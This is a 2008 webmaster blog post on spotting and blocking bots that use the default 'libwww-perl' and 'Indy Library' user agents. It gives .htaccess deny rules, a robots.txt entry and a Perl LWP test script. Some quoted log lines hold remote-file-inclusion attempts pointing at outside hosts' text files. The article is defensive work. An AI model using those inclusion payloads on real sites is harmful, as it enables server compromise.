Here are some sample lines from our server logs ... and I don't like the look of them!
from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24
from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17
Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (also known as the "User Agent") - are very likely attempts to find a security hole in our site scripts, through which the attacking program can copy itself onto our server and go on to infect other systems, or use our site to advertise another by injecting its own URLs. So what are "Indy Library" and "libwww-perl"?
Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...
libwww is from the Perl LWP (Library for WorldWideWeb in Perl) library, so in this case it's probable that someone has written an automated program in Perl ...
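Before blocking anything, it's worth seeing how often these agents actually turn up in your own logs. A quick grep will do - here's a sketch run against a sample log line, since access log locations vary from server to server:

```shell
# Count log lines mentioning either default user agent (case-insensitively).
# On a real server you would run this over the access log itself, e.g.
#   grep -c -i -e 'libwww-perl' -e 'indy library' /var/log/httpd/access_log
# (that path is an assumption - adjust for your own layout)
logline='64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /index.html HTTP/1.1" 403 - "-" "libwww-perl/5.805"'
printf '%s\n' "$logline" | grep -c -i -e 'libwww-perl' -e 'indy library'   # prints 1
```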
Automated programs are a necessity - and indeed we welcome well-behaved crawlers, from the well-known Google and Yahoo through to more obscure ones. But authors of such crawlers who properly know what they're doing change the User Agent string rather than using the default. In my experience, we really don't want the default crawlers on our site: at least 90% of them are malicious, and the remaining 10% amateur. So how can we turn them off?
Standard practice is to ask specific user agents to stay away via the robots.txt file - but chances are that the naughty bots won't respect that, so we need to enforce the rule!
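For completeness, here's what that robots.txt request looks like - a sketch of the standard convention, which well-behaved crawlers honour and the naughty ones simply ignore:

```
User-agent: libwww-perl
Disallow: /

User-agent: Indy Library
Disallow: /
```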
Here are three lines that I've added to our
.htaccess file ...
SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys
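(Those directives use the access-control syntax of Apache 2.2, which our server runs. On Apache 2.4, where the old Deny directive lives in the optional mod_access_compat module, the equivalent with the newer authorization directives would be something like the following sketch:

```
SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
<RequireAll>
    Require all granted
    Require not env naughty_boys
</RequireAll>
```

The RequireAll container grants access to everyone except requests where the naughty_boys environment variable has been set.)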
These send a 403 Forbidden response to the automata, telling them that they can't have the page they seek. Goodness knows what the receiving bot will do with the error - but we can make our 403 handler simple, quick, secure, and light on bandwidth.
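One way to keep that 403 response light is Apache's ErrorDocument directive, which can serve a short plain string rather than a full error page - one more line for the .htaccess file:

```
ErrorDocument 403 "Forbidden"
```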
How do we test that?
Here's a simple Perl script that will declare itself as being libwww:
#!/usr/bin/perl
# Fetch a page using LWP's default user agent string (libwww-perl/x.xx)
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $ua  = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
my $res = $ua->request($req);
if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " . $res->status_line . "\n";
}
And when I run that, it now gives me:
-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$
If I add the line:
$ua->agent("Well House Consultants Bot");
into that program, I get a much more satisfying result back ...
-bash-3.2$ perl pg2
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on
Links - full source code of our test program without and with our own user agent being set.
One of the matters that I considered very carefully before blocking these user agents was the possibility that I'm blocking some useful and important traffic along with the "nasties" - throwing out the baby with the bathwater, if you like. Not the case, I believe - most people who have legitimate bots take good care of them and name them properly - but I will be watching my log files nonetheless to check.
As I finished writing this article - some poetic justice from my log file ...
64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty-programs-looking-for-security-holes-on-your-server-.html/errors.php?error=http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes, and is being firmly denied access. (written 2008-09-13)